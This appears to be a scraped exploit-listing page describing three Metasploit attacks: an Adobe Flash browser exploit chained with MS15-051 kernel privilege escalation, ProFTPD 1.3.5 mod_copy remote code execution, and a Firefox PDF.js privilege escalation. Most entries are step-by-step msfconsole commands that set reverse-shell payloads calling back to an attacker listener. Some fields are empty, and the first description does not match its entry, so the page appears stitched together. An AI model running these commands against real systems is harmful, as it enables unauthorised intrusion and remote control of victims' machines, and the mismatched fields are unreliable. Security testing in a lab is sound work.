Tested on :

Description :

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Commands :

Remote exploitation
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run
getuid
Local privilege escalation
use exploit/windows/local/ms15_051_client_copy_image
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
set SESSION 1
run
getuid

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 on 2015-06-09
Vulnerability discovered being exploited in exploit kits on 2015-06-16
Metasploit PoC provided on 2015-06-25

PoC provided by :

Reference(s) :

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

CentOS 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the ‘nobody’ user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

This vulnerability can only be exploited under particular conditions:
– ProFTPD needs write access to a web-accessible folder, i.e. the folder must be writable by the user ProFTPD runs as.
– SELinux must be disabled.

Commands :

ProFTPD is running with user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in the proftpd.conf file
A “test” folder has been created in “/var/www/html/” with nobody:nobody ownership
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run
id
Done!

PoC provided by :

Reference(s) :

Affected version(s) :

Firefox versions below 37

Tested on :

Windows 7 SP1 with Firefox version 36.0.4

Description :

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs (CVE-2015-0802). PDF.js (CVE-2015-0816) is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Commands :

use exploit/multi/browser/firefox_pdfjs_privilege_escalation
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp
set LHOST 192.168.6.138
run
SYSTEMINFO